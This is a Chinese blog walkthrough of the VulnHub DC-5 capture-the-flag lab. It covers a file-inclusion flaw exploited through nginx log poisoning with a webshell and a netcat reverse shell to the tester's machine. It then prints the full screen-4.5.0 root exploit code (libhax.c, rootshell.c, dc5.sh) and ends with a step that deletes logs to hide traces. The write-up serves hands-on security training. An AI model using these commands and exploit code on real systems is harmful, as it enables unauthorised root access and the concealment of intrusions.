DC-5渗透测试教程详解

最新推荐文章于 2023-05-25 16:58:41 发布
最新推荐文章于 2023-05-25 16:58:41 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: DC的小样夺旗 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51079220/article/details/129112840
版权
本文详细介绍了如何进行DC-5的渗透测试,包括测试环境的设置,使用nmap进行扫描,发现并利用文件包含漏洞,通过Burpsuite抓包上传文件,利用蚁剑进行连接和提权,最终找到并利用SUID文件进行系统权限提升,同时讲述了渗透测试后的痕迹清理和编写渗透测试报告的重要性。
摘要由CSDN通过智能技术生成

DC-5渗透测试教程详解

测试机和靶机准备

有需要自取,注意调整DC-5的与kali在同一个为NAT模式下

  • [测试机kali]
    在这里插入图片描述

  • [靶机DC-5]

  • 在这里插入图片描述

信息收集

kali的IP地址为 192.168.10.140
- kali
在这里插入图片描述 - dc-5在这里插入图片描述

使用nmap进行扫描

在这里插入图片描述

  • 打开浏览器登录 192.168.10.134进行访问,确定其是否为目标主机
  • 在这里插入图片描述

漏洞分析

寻找漏洞

在这里插入图片描述

  • 在contact界面提交信息后,发现底部的时间显示会变动,
  • 所以猜测可能存在漏洞。底部的年份显示独立存在的数据,
  • 可能存在于某个文件中,传递给了thankyou.php。
验证猜想,使用御剑对其扫描

  • 发现有可以文件 footer.php
    在这里插入图片描述

  • 对其进行访问,kali火狐,输入链接:192.168.10.136/footer.php,该文件内容恰好】是底部的年份信息

  • 在这里插入图片描述

猜想是否行访问,kali火狐,输入链接:192.168.10.136/footer.php,该文件内容恰好是底部的年份
有可能是通过链接传入的!

验证猜想,构造连接
  • 验证想法,构造链接,访问对比,192.168.10.136/thankyou.php?file=footer.php

在这里插入图片描述

  • 192.168.10.139/thankyou.php?file=
    在这里插入图片描述

  • 如果参数值换成/etc/passwd,那么在底部就会显示DC5的用户信息
    在这里插入图片描述

  • 如果参数值换成nginx日志文件的目录/var/log/nginx/error.log,那么在底部就会显示nginx的日志文件信息。
    在这里插入图片描述

渗透测试

文件包含漏洞:通过日志挂马的方式,想办法将一句话木马写入到靶机的日志文件中

在这里插入图片描述

上传分析

在这里插入图片描述

使用Burp suite抓包,上传

在这里插入图片描述

在这里插入图片描述

  • 验证 http://192.168.10.134/thankyou.php?file=/var/log/nginx/error.log ,查看日志是否上传成功
    在这里插入图片描述
使用蚁剑连接

在这里插入图片描述

  • 测试连接
    在这里插入图片描述
    在这里插入图片描述
  • 输入命令 ——发现没有权限
    在这里插入图片描述
建立反向连接
  • kali建立反向连接
  • 在kali上开启监听,终端输入命令nc –lvvp 1234
  • 蚁剑中执行命令 nc -e /bin/bash 192.168.10.140 1234 。
  • 在蚁剑中执行的命令不要复制,要手动输入。 192.168.10.140是kali的地址。
    在这里插入图片描述

后渗透测试

查看提权文件

  • 在kali上输入python -c ‘import pty;pty.spawn(“/bin/bash”)’
    在这里插入图片描述

  • 找到具有SUID的文件,文件,用来提权。find / -perm -u=s -type f 2>/dev/null
    在这里插入图片描述

查找EXP, 重新打开一个终端,在kali中通过命令searchsploit查看screen-4.5.0的漏洞。

在这里插入图片描述

创建脚本

在这里插入图片描述

  • 复制的脚本没办法直接执行,所以需要将其拆分为多个文件处理。

  • 在kali的root文件夹下新建文件,命名为libhax.c。

  • 将41154.sh脚本中的第一部分内容复制到libhax.c文件 。
    在这里插入图片描述

  • 将脚本中选中内容复制到libhax.c文件中。
    在这里插入图片描述

  • 在libhax.c文件中添加所选中的语句
    在这里插入图片描述

  • libhax.c的内容:(第一个文件内容)

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
  • 将libhax.c文件ctrl s保存,然后打开终端窗口,在终端窗口里执行命令
  • 用来生成动态库文件libhax.so
gcc -fPIC -shared -ldl -o libhax.so libhax.c
  • 在kali的root文件夹下新建文件命名为rootshell.c,用来处理脚本中的第二部分内容
  • 将41154.sh脚本中的选中部分,复制到rootshell.c文件中
    在这里插入图片描述
  • 在rootshell.c文件中,第二行添加语句#include<unistd.h>,在文件的倒数第二行,删掉一个多余的NULL .
  • rootshell.c的文件内容:(第二个文件内容)
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh",NULL);
}
  • 保存并退出rootshell.c文件,在kali的终端窗口中,输入命令gcc rootshell.c –o rootshell,用来生成一个可以执行的二进制文件.
gcc -o rootshell rootshell.c
  • 将41154.sh脚本中的最后一部分内容,复制到dc5.sh文件中
  • dc5.sh文件内容:(最后一个文件内容):
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
  • 在终端窗口中,按esc,再按shift + : ,窗口底部应该出现冒号,输入set ff=unix,回车
    在这里插入图片描述
  • 在kali中复制刚刚制作好的三个文件,到Windows中的任意位置。
使用蚁剑上传文件提权

  • 打开蚁剑,找到/tmp目录,右键上传文件

  • 在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • 给dc5.sh文件添加可执行权限

chmod +x dc5.sh
  • 执行脚本 ./dc5.sh
    在这里插入图片描述

在这里插入图片描述

拿到flag

在这里插入图片描述

清理痕迹
  • 删除上传的三个提权文件
  • 删除/var/log/nginx/error.log的日志文件

渗透测试报告

  • 使用报告文档交流在渗透测试过程踪做了哪些,如何做,以及最为重要的—客户如何修复你发现的安全漏洞与弱点。
不懂说安全
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2104
vulnhub靶场渗透练习详解——DC9
DC-5主机渗透
最新发布
weixin_65920814的博客
05-25 234
本文详细介绍DC-5主机渗透测试的全部内容
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 7326
DC-5靶机渗透测试详细教程
DC-5渗透实战】
qq_23347209的博客
10-02 1848
其实后续操作呢就是阅读这个.sh文件内容并且按流程操作就可以了简单说明:需要分别创建.c文件并且进行编译后传到目标靶机服务器上,最后执行.runme.sh文件就可以提权到root。Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式。在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资。源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能。使用find命令查看可以利用的权限执行。
Vulnhub靶机渗透测试——DC-5
Cobra的博客
05-11 1031
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.184 靶机下载地址: 二、信息收集 1、使用nmap进行存活主机探测 nmap 192.168.189.0/24 2、发现IP192.168.189.184开放80,111端口,再次使用nmap对其进行扫描 nmap 192.168.189.184 -sV -T4 -A -p- 3、访问其80端口 4、浏览页面并没有发现可以进行漏洞利用的地方,使用
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2402
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1155
dc-1靶机详细获取flag过程新手勿喷
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5802
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
DC-5入门练习
Mr_helloword的博客
07-20 599
DC-5靶机渗透 1. 信息收集 1.查看dc-5主机mac地址 2. nmap扫描 nmap -sP 192.168.1.0/24 -oN nmap.sP nmap -A 192.168.1.6 -p 0-6635 -oN nmap.A 发现目标靶机地址为192.168.1.6 查看目标主机开放那些端口 由于开发80我们登录随便看一看 这些网站页面都放在根目录下,我们可以用御剑扫描后台,发现最后一个页面这里可以提交表单,参数(都显示在url里) 发现每次刷新网页下面都会变化 2.御剑扫描
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5774
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-5 渗透测试
Darklord.W
04-14 1940
DC-5渗透测试 0x00实验环境 靶机DC-5,IP地址:192.168.8.138 测试机:Kali,IP地址:192.168.8.140; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web 扫描web目录 然而没有什么有价值信息 继续浏览得到 但是我们发现这里contact页面的年份...
DC-5靶机攻略
weixin_47311099的博客
07-16 782
DC-5靶机通关攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap_sp 目标主机ip地址为:192.168.64.129 端口扫描 nmap -A 192.168.64.129 -oN namp_a 发现80 访问80端口 发现只有Contact页面有用, 尝试提交内容 刷新发现底部时间变化 推测这里存在文件包含 目录扫描 御剑扫描 访问footer.php 刷新 确定thankyou.php包含了footer.php,存在文件包含,可以尝试文件
渗透DC-5-文件包含
告白的博客
08-13 321
0x00 环境介绍 本次研究DC系列dc-5渗透提权过程 靶机下载:https://www.vulnhub.com/entry/dc-5,314/ 0x01 信息收集 1)IP收集----192.168.213.153 arp-scan -l 2)端口扫描----80/tcp open http nginx 1.6.2 nmap -A -p- 192.168.213.153 3)目录爆破,使用dirbuster,调用kali自带的字典, 字典位置:usr/share/wordlists/d
DC-5
per_se_veran_ce的博客
10-07 467
1、发现目标主机,信息收集 开放端口80,111,59888 2、访问80端口 尝试提交留言 刷新一次年份变化一次 http://192.168.168.203/thankyou.php?firstname=1&lastname=1&country=australia&subject=1 3、御剑扫描敏感目录 4、逐步去试,发现footer.php...
DC靶机渗透系列(DC1-DC3)
居上
07-01 780
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
DC-5靶机渗透
weixin_45349299的博客
02-13 239
kali攻击机:192.168.235.130。
DC-1 渗透测试
Darklord.W
04-13 1592
DC-1 渗透测试 0x00实验环境 靶机DC-1,IP地址:192.168.8.129 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 masscan、nmap扫描 先访问web 尝试注册账号admin,显示已存在,考虑爆破密码以...
DC-DC电源模块工作原理详解
"DC-DC电源模块是一种将直流电转换为另一固定或可调直流电的设备,广泛应用在各种电子设备中。它的工作原理主要涉及高频开关、滤波、控制和储能等环节,以实现高效、小型化和稳定的电源供应。" DC-DC电源模块的核心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不懂说安全

创作不易您打赏是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值